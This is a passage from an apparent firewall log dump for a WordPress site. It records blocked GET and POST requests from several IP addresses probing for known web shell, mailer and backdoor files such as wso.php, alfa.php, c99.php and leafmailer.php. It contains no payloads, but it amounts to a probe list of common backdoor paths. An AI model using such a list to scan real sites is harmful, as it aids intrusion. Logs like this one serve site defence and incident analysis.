Chrome\\/108.0.0.0 Safari\\/537.36\"}','bUdT2Synz41C9F6Boc3VOxjD',0,1673950829.3614,180,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/new.php','','{\"1\":\"python-requests\\/2.28.1\"}','wDla9L5bgfX4n0HWTIckUECh',0,1673950829.5990,250,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','nECfXWB4NzgxMYUtmwqvZ8sV',0,1673950829.6095,272,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/uploads/2021/12/up.php','','{\"1\":\"python-requests\\/2.28.1\"}','tA3o6MxN28phig0n9lzSXwuL',0,1673950829.6188,263,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','pREaFlUYSZkL8xWduNXKo1cA',0,1673950829.6709,246,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/plugins/fighter/fk.php','','{\"1\":\"python-requests\\/2.28.1\"}','pz5cnDxhF4V1UbdNlIXogGa2',0,1673950829.6784,259,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"python-requests\\/2.28.1\"}','R6vMP74wo5tc2bLG3fXJYsAQ',0,1673950829.6482,308,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/hello.php','','{\"1\":\"python-requests\\/2.28.1\"}','IJwFY9qxLci2DyR3G5dUKs7N',0,1673950829.7638,245,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VbhvSjPW8z6ckoYgxBdnD5re',0,1673950830.0868,208,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','NzbY84hjKM3sRBA15krdx6of',0,1673950830.1004,207,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','SOyhP0DZ1KFI8QpbmqW53kua',0,1673950830.1050,202,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jXweJdEPgQxabmNVo40kcrz7',0,1673950830.1002,227,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/uploads/2021/12/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','gfh7NISMGu8ydk34msAvePzT',0,1673950830.1013,237,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/plugins/fighter/fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6SEP5Dy2R0L9b4xWIB3mpZf7',0,1673950830.1087,290,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','OfeqHoUasTu8KRywFJd0XBbn',0,1673950830.1870,233,'','GET',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.dailyjolly.co.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','H6WbYoFXhCxrSL9OPejdtlM1',0,1673952301.2181,237,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Z1I7l84erXwLSb5jAyfTFo0N',0,1673955346.4069,246,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','z5HCyYKcOlUEJ8u7PDmiAvbx',0,1673955347.5963,188,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ru.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','7QXt3dTVmroxFKPWzauSOvM2',0,1673955348.7288,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','MSTyiVaBo5N1x6A0m93IKtWR',0,1673955349.8212,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','kyHEwGir1NjxnvSPXgMDpBa2',0,1673955350.9440,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','QtX6rs5z8xZnBT3ASmgH2iK1',0,1673955352.0751,194,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/skipper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','RNlvKBMCnhyGZQdD5JerT6uV',0,1673955353.1899,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/skippershell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2sv8OBVy7x04DEAtmiKYr3Mb',0,1673955354.3155,173,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/tttt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','fEBpqIUh4ksO3XQm9yZbx08P',0,1673955355.4345,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/tshop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','adrXNeUSQGB431ToIwglDP9m',0,1673955356.5318,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','bncJ5gYMQVdHaUP2ZG3sWX8w',0,1673955357.6677,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','s03q2doz5MumxjF1TE4AVpiR',0,1673955358.7406,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/inje3ctor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','o9l0eihWpnqByFrGPuwfQZD3',0,1673955359.8502,197,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/saudi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','4fNP6FR9SEnKxpw7WLl2CtuJ',0,1673955360.9809,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','N56ITfgeQJD9ujE2HPYazrLS',0,1673955362.0780,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','c4V2iqb36ZQUrODAnxLJ8Mm9',0,1673955363.1878,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/my_alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','pPOeV7g3FivoGzIqdEkAW2hR',0,1673955364.2945,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','04AvByYXlrCqDh82tpQnGJe1',0,1673955365.3804,196,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','3h9IVAZybUCOnK1irj5lGQ72',0,1673955366.5011,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/hacked.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','I0HQuGFd2rWL8epiNg4t6lZf',0,1673955367.6164,189,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2ONc5pjasHqXEbDhFA9MG07W',0,1673955368.7367,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','PJ9i5OYyfV67gNA8ozMecUKs',0,1673955369.8200,218,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/Navir.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','SaFqP0Rdj6NBV1pOEGWHKLnu',0,1673955370.9605,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/cmd13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','fWBJpyUrCI0xhLK9QgwDne7S',0,1673955372.0533,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/inc20k1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','24KFrSAuRjbDqWfzHN9caXvt',0,1673955373.1609,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','4iUROPd0DSxCho76ZGQyqBgT',0,1673955374.2452,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','IpVxgvKdUGs8zlia1w6qy4NW',0,1673955375.3816,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','WoD2d9eKvzkqLYxOJ3t7S0IG',0,1673955376.4676,161,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','zqrFt4fMB8w6HRWxvOuJycpX',0,1673955377.5491,253,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','TgdY7ksFXGiZPEmf52nBQCah',0,1673955378.7505,181,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Diz2EY1BtqW583xrS6ReQLOg',0,1673955379.8626,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','IgjxTWDelptU7f8M1NE0uBHn',0,1673955380.9839,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','pc4ebArZRNn8yg2D1xCHPWsQ',0,1673955382.0783,209,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','B8PUORmgZIHWMo9tkA0bGfad',0,1673955383.8747,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/LEAF.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','98HsQLDNrCfzAlOVghKE67Wj',0,1673955385.0099,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','gw27caqsuzNlkxBb0mDfTMnA',0,1673955386.1018,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','NExteqQjWKFdYfrk1hAuRTiM',0,1673955387.1864,208,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','xyLMKkiHb1detN5RGmg9PXEn',0,1673955388.3369,210,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2EpwJj1KFrCW3xdLGXH7abhZ',0,1673955389.4921,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','92WUdEw1B7IhvkrM5ZgAfNHx',0,1673955390.5722,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','TqCm5bNt69OngyPAhDJV3Sv8',0,1673955391.6648,181,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','AxKNdO1Wk4tgsUouX8jJLyhZ',0,1673955392.7736,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','0TMcbY4qej2l8uzB6fpyiESZ',0,1673955393.8779,222,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','fqLzkbiIR0deGrl9XwpxDFga',0,1673955395.0546,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','z7BdbwXDNxqmaQFkcgLyOGC2',0,1673955396.1416,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','jlwNkYVJ2h8Age6GcboUdpSQ',0,1673955397.2502,189,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','RLh75TbrtDwVe4IPKN2cgyqC',0,1673955398.3767,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','iEg3AjX9la5u2pkVULY1CvbP',0,1673955399.5175,348,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','3MX1IZyE8t6b9orNhOgqiAeQ',0,1673955400.7836,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','V5UnPdzlDTmE3RNqQbXFfBeG',0,1673955401.8797,216,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ByW96nAuQ4COoF8L2ZVvpiHt',0,1673955403.0434,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','qB6HwoOXNSACe97aUvYVRJpi',0,1673955404.1414,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','cRoqlHfumn5DxrhIgJ1ezFj2',0,1673955405.2251,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','sGmlVqhCcebZyQIU2BAY97XH',0,1673955406.3150,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','oU0B8PtNcXmLRCeSkrJsIVvY',0,1673955407.4108,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','LHY0ztsoRfb4arJwxBSihgNv',0,1673955408.4977,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Yg7pBM2uVW0ZHNf4GdazOKhb',0,1673955409.6559,184,'','GET',403,0,700,0,1,'',0),('83.240.221.24',1408294168,'','https://dailyjolly.co.uk/wordpress/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"http:\\/\\/dailyjolly.co.uk\"}','ExpuATy9rt6wnzPsV0o1LC7d',0,1673962460.3633,188,'','GET',403,0,700,0,1,'',0),('83.240.221.24',1408294168,'','https://dailyjolly.co.uk/blog/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"http:\\/\\/dailyjolly.co.uk\"}','TmNbDUgkyxFe4WJGc3OC5SYQ',0,1673962460.8250,178,'','GET',403,0,700,0,1,'',0),('83.240.221.24',1408294168,'','https://dailyjolly.co.uk/wp/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"http:\\/\\/dailyjolly.co.uk\"}','O5hejSJZmtL3BUzfMKC9n1pE',0,1673962461.2300,166,'','GET',403,0,700,0,1,'',0),('123.30.50.68',2065576516,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','pQkuCtmI2fVMnBi9AhUXDvP4',0,1673963691.7721,196,'','GET',403,0,700,0,1,'',0),('123.30.50.68',2065576516,'','https://www.dailyjolly.co.uk/wp-includes/versions.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','8fZnmc1JD20wCx7OLgq4hejX',0,1673963695.8229,181,'','POST',403,0,700,0,1,'',0),('123.30.50.68',2065576516,'','https://www.dailyjolly.co.uk/wp-admin/assets/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','DIY2HeQb5JxvRzMrKuWmpjZ3',0,1673963697.2457,242,'','GET',403,0,700,0,1,'',0),('123.30.50.68',2065576516,'','https://www.dailyjolly.co.uk/wp-content/plugins/walfs/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Paq4oC09SkpfVbhJQDxdvMlt',0,1673963698.4623,169,'','GET',403,0,700,0,1,'',0),('123.30.50.68',2065576516,'','https://www.dailyjolly.co.uk/wp-includes/fonts/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','HaLkmj8T6XECJ5KdcZygQ0P3',0,1673963701.8549,164,'','GET',403,0,700,0,1,'',0),('123.30.50.68',2065576516,'','https://www.dailyjolly.co.uk/wp-includes/js/thickbox/themes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2UHk6ErI4cDMSWO3CQJfsRdi',0,1673963703.2860,195,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/installation/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','rADVtepUKECW21hGRi9uxPcF',0,1673991590.6406,199,'','GET',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 